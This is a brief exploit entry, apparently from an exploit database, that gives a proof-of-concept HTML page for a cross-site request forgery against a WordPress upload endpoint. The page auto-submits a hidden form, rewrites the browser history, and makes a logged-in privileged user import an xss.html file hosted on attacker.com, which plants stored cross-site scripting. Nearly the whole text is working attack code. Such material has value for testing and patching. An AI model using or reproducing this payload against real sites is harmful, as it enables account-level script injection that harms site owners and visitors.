## https://sploitus.com/exploit?id=WPEX-ID:16375A7F-0A9F-4961-8510-D047FFBF3954
Have a logged in user with the unfiltered_html capability open an HTML file containing the following (this will make them upload the xss.html file):
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/wp-admin/upload.php" method="POST">
<input type="hidden" name="multiurl" value="https://attacker.com/xss.html" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>